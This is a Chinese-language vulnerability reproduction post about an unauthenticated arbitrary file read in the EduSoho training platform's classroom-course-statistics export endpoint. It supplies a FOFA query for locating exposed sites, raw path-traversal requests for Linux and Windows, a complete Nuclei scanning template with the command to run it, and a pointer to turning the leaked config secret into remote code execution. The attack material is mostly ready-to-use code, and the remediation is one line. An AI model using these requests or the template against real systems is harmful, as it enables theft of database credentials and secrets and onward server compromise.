【漏洞复现】EduSoho教培系统 任意文件读取

该文章由掌控安全学院——1782814368投稿

【产品介绍】

EduSoho企培系统,基于EduSoho教育云PaaS平台的底层技术打造,专门为快速发展的企业提供一体化企业培训、企业内训组织解决方案,专注人才培养、专注组织建设,帮助企业构建学习型组织,促成终身学习、实现快速发展。

【漏洞介绍】

该教培系统classroom-course-statistics接口存在未授权任意文件读取漏洞,通过该漏洞攻击者可以读取到config/parameters.yml文件的内容,拿到该文件中保存的secret值以及数据库账号密码等敏感信息。拿到secret值后,攻击者可以结合symfony框架_fragment路由实现RCE

【资产测绘Query】

fofa语法:

 
  1. title="Powered By EduSoho" || body="Powered by <a href=\"http://www.edusoho.com/\" target=\"_blank\">EduSoho" || (body="Powered By EduSoho" && body="var app")

【产品界面】

【漏洞复现】

【poc】

linux系统:

 
  1. GET /export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd HTTP/1.1
  2. Host: 127.0.0.1


windows系统:

 
  1. GET /export/classroom-course-statistics?fileNames[]=../../../../../../../Windows/win.ini HTTP/1.1
  2. Host: 127.0.0.1

【Nuclei-Poc】

 
  1. id: EduSoho_arbitrary_file_read_crossplatform
  2. info:
  3. name: EduSoho Cross-Platform Directory Traversal Vulnerability
  4. author: yourname
  5. severity: critical
  6. description:
  7. tags: directory-traversal,cve,critical
  8. requests:
  9. - method: GET
  10. path:
  11. - "{{BaseURL}}/export/classroom-course-statistics?fileNames[]=../../../../../../../etc/passwd"
  12. - "{{BaseURL}}/export/classroom-course-statistics?fileNames[]=../../../../../../../Windows/win.ini"
  13. matchers-condition: and
  14. matchers:
  15. - type: word
  16. part: body
  17. words:
  18. - "root:x:0:0:root:/root:/bin/bash" # Unix-like systems
  19. - "[extensions]" # Windows systems
  20. condition: or
  21. - type: status
  22. status:
  23. - 200
  24. - type: word
  25. part: body
  26. negative: true
  27. words:
  28. - "empty file"
  29. condition: and
  30. - type: word
  31. part: body
  32. negative: true
  33. words:
  34. - "\"success\": 0"
  35. condition: and

【验证】

.\nuclei -l 1.txt -t 4.yaml

【修复建议】

1:更新到最新版本

申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

免费领取安全学习资料包!

渗透工具

技术文档、书籍

 

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

 

应急响应笔记

学习路线

  • 8
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值